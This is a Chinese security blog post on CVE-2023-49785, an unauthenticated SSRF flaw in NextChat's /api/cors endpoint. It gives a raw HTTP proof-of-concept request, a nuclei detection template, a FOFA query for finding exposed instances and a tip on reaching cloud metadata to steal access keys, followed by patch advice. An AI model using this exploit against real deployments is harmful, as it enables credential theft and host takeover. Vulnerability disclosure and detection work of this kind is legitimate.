NextChat cors SSRF漏洞 (CVE-2023-49785)

已于 2024-06-19 15:58:29 修改
阅读量313 收藏 1
点赞数 8
文章标签: 网络 linux 前端 漏洞挖掘
于 2024-06-19 15:46:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/139805335
版权

漏洞描述

NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。

tips:结合云主机的特点,可通过ssrf访问云主机元数据,例如读取AK/SK,实现云主机接管。

产品界面

fofa语法

title="NextChat"

POC

 

  1. GET /api/cors/https/www.baidu.com HTTP/1.1
  2. Host: 
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 
  4. (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  5. Connection: close
  6. Accept: */*
  7. Accept-Language: en
  8. Accept-Encoding: gzip
 

 

 

nuclei验证
 

 

  1. id: CVE-2023-49785
  3. info:
  4. name: NextChat cors SSRF漏洞 (CVE-2023-49785)
  5. author: nobody
  6. severity: high
  7. description: |
  8. NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。
  9. 2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在
  10. 无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
  11. impact: |
  12. 攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等.
  13. remediation: |
  14. 升级版本,打补丁
  15. metadata:
  16. verified: true
  17. max-request: 3
  18. fofa-query: title="NextChat"
  19. tags: ai,gpt,nextchat,ssrf
  21. 修复建议 
  22. 建议升级到最新版本或打补丁
  23. 非必要禁止公网访问或白名单访问
  24. requests:
  25. - raw:
  26. - |
  27. GET /api/cors/https/www.baidu.com HTTP/1.1
  28. Host: {{Hostname}}
  29. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) 
  30. AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 
  31. Safari/537.36
  32. Connection: close
  33. Accept: */*
  34. Accept-Language: en
  35. Accept-Encoding: gzip
  37. matchers:
  38. - type: dsl
  39. dsl:
  40. - status_code == 200 && contains_all(body,"京ICP证030173
  41. 号")
 

 

 

修复建议
 

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问
  •  
    申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
     

                

        

        

    




    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    8
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)

				
			

			

				

					0xSec
				

				

					03-14
					
					1076
					
				

			

		

		

			
				
2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。

			
		

	



                

              
                



	

		

			

				
					
被动扫描工具(myscan)

				
			

			

				

					lza20001103的博客
				

				

					08-29
					
					1663
					
				

			

		

		

			
				
被动扫描工具(myscan)
文章目录被动扫描工具(myscan)前言运行原理演示地址如何运行检测插件优势与不足
前言
myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。 此项目源自个人开发项目,结合个人对web渗透,常见漏洞原理和检测的代码实现,通用poc的搜集,被动扫描器设计,以及信息搜集等思考实践。
运行原理
myscan依赖burpsuite和redis,需启动redis和burpsuite插

			
		

	



                


  
              

                


	

		

			

				
					
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析

				
			

			

				

					sxr__nc的博客
				

				

					04-19
					
					3464
					
				

			

		

		

			
				
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。

			
		

	





	

		

			

				
					
网络安全-自学笔记

					
热门推荐

				
			

			

				

					关注网络安全、云原生安全
				

				

					12-01
					
					16万+
					
				

			

		

		

			
				
目录

WEB(应用)安全

前端安全

xss攻击

后端安全

文件上传漏洞

WebShell

解析安全

数据安全

sql注入

通信安全

WEB(应用)安全

前端安全

xss攻击

后端安全

文件上传漏洞

WebShell

解析安全

数据安全

sql注入

网络安全-sqlmap学习笔记

通信安全

网络-http协议学习笔记(消息结构、请求方法、状态码等)




...

			
		

	



		

			
		



	

		

			

				
					
面试总结-2023届安全面试题总汇

				
			

			

				

					lza20001103的博客
				

				

					09-16
					
					6492
					
				

			

		

		

			
				
2023届安全面试题总汇
文章目录2023届安全面试题总汇前言0x01 秋招目录(随时更新)0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享
前言
最近发现一个宝贵的面试文章,写了各个以分安全为业务的公司汇总,也是面试官经常会问到的问题,以及CTF经历也是面试官所看好的,大家平时要多多打打CTF和靶机实战呀,这样我们的实战能力才会所有提高。
0x01 秋招目录(随时更新)
有最新的公司校招信息可以随时发布,第一时间更新主要安全行业的公司,主要放不以安

			
		

	





	

		

			

				
					
浅析SpringBoot框架常见未授权访问漏洞

				
			

			

				

					道阻且长,行则将至。
				

				

					02-23
					
					5472
					
				

			

		

		

			
				
本文总结学习了 Swagger-UI、SpringBoot Actuator、Druid、Webpack 组件的未授权访问漏洞基本原理与漏洞探测方法,在介绍了几款自动化扫描工具的同时,也简要分析了 CVE-2022-22947 Spring Cloud Gateway RCE 漏洞

			
		

	





	

		

			

				
					
Gin-Vue-admin垂直越权漏洞与代码分析-CVE-2022-21660

				
			

			

				

					ZL_1618的博客
				

				

					08-16
					
					251
					
				

			

		

		

			
				
欢迎各位大佬们给该项目点一个star文章写完了之后,申请CVE有一些麻烦,不过好在还是申请到了,github的员工响应迅速ps 申请CVE前,已经提交了CNVD。

			
		

	





	

		

			

				
					
java代码审计3之常见漏洞的代码审计

				
			

			

				

					赵花花08042的博客
				

				

					10-30
					
					2500
					
				

			

		

		

			
				
---------常见漏洞的代码审计--------
CSRF
抓取请求数据包,删除referer字段再重新提交
一般不需要代码审计来挖掘,专门的csrf漏洞的检测工具
如果要通过代码审计去挖掘csrf,首先了解该开源程序的框架,csrf漏洞一般会在框架中存在防护方案



SSRF

CVE-2019-9827
CVE-2014-4210
URL跳转
Url重定向漏洞,服务端未对传入的跳转地址进行检查和控制,导致攻击者可构造任意恶意地址,诱导用户跳转到恶意网站。

通常发生在登录,统一身份认证处。大多数访

			
		

	





	

		

			

				
					
Find-Sec-Bugs 漏洞范例

				
			

			

				

					zhaohonghan的博客
				

				

					04-03
					
					1万+
					
				

			

		

		

			
				
Find-Sec-Bugs 漏洞范例
欢迎使用Markdown编辑器
你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。
新的改变
我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:

...

			
		

	





	

		

			

				
					
cors-filter-2.10.jar

				
			

			

				

					10-10
				

			

		

		

			
				
Tomcat设置跨域访问,cors-filter最新版本

			
		

	





	

		

			

				
					
Allow CORS Access-Control-Allow-0.1.9.zip

				
			

			

				

					12-26
				

			

		

		

			
				
名称:Allow CORS Access-Control-Allow ---------------------------------------- 版本:0.1.9 作者:Muyor 分类:生产工具 ---------------------------------------- 概述:轻松将(Access-Control-Allow-Origin...

			
		

	





	

		

			

				
					
cors-filter-2.5.jar

				
			

			

				

					09-07
				

			

		

		

			
				
解决java web应用跨域问题所需要用到的jar包

			
		

	





	

		

			

				
					
cors-filter-2.9.1.jar

				
			

			

				

					10-10
				

			

		

		

			
				
cors-filter-2.9.1.jar

			
		

	





	

		

			

				
					
cors-filter-2.9.jar

				
			

			

				

					04-25
				

			

		

		

			
				
如果Cesium无法显示tomcat发布的瓦片,则需要对Tomcat做跨域处理,做法如下: 首先下载cors-filter-2.5.jar和java-property-utils-1.9.1

			
		

	





	

		

			

				
					
互联网的起源与发展历程:从ARPANET到现代网络社会

				
			

			

				

					Kimi2024的博客
				

				

					06-18
					
					609
					
				

			

		

		

			
				
互联网从1960年代的ARPANET起源,经过数十年的发展和演变,最终成为我们今天所熟知的全球信息网络。每一个阶段的技术创新和发展,都为互联网的普及和应用奠定了基础。

			
		

	





	

		

			

				
					
零基础入门网络安全最直线距离的学习路线_网络工程师零基础能考过吗

				
			

			

				

					qkh1234567的博客
				

				

					06-19
					
					879
					
				

			

		

		

			
				
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包。😝有需要的小伙伴,可以点击下方链接免费领取【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析。

			
		

	





	

		

			

				
					
网络编程1

					
最新发布

				
			

			

				

					bonfirelit的博客
				

				

					06-21
					
					171
					
				

			

		

		

			
				
服务器接收到 FIN 包后,会向客户端发送一个 ACK(Acknowledgment)包,确认已经接收到 FIN。客户端接收到服务器的 FIN 包后,向服务器发送一个 ACK 包,确认已经接收到 FIN。网络编程中,客户端调用close或者shutdown后,操作系统会给服务器发送一个FIN。操作系统会发送一个 FIN 包给服务器,表示客户端不会再发送数据。服务器进入半关闭状态,可以继续向客户端发送数据,但不能再接收数据。当双方都发送并接收到 FIN 和 ACK 包后,连接才完全关闭。

			
		

	





	

		

			

				
					
.[nicetomeetyou@onionmail.org].faust深入剖析勒索病毒及防范策略

				
			

			

				

					safe130_的博客
				

				

					06-18
					
					794
					
				

			

		

		

			
				
halo,.360,.faust,.2700, .eking,elbie, .wis,.mkp,.malox,.rmallox,.mallox,.hmallox,  .anony,  .ma1x0,.live,.carver,.locked,_locked,.locked1,.svh , lockbit, .src, .datah, .BEAST,.DevicData-P, .kat6.l6st6r 等等,即使遭受了勒索病毒的攻击,用户也可以通过备份数据恢复被加密的文件,从而避免重大损失。

			
		

	





	

		

			

				
					
cors Access-Control-Allow-Origin 值

				
			

			

				

					05-22
				

			

		

		

			
				
CORS(跨域资源共享)是一种机制,允许在浏览器上运行的Web应用程序访问不同源的Web资源。当一个Web应用程序向另一个域发送请求时,浏览器会执行一个CORS检查,以确保目标域允许跨域访问。其中Access-Control-Allow-Origin就是CORS协议的一个头部信息,用于指定允许访问该资源的域名,可以设置为"*"表示接受所有域名的请求。

举个例子,如果服务器的Access-Control-Allow-Origin设置为http://www.example.com,则只有来自该域名下的请求才能访问该资源。如果值为"*",则所有域名都可以访问该资源。

注意:由于跨域访问会涉及到安全问题,因此需要谨慎使用CORS机制。建议在服务器端对请求进行鉴权等处理,以确保安全性。



			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值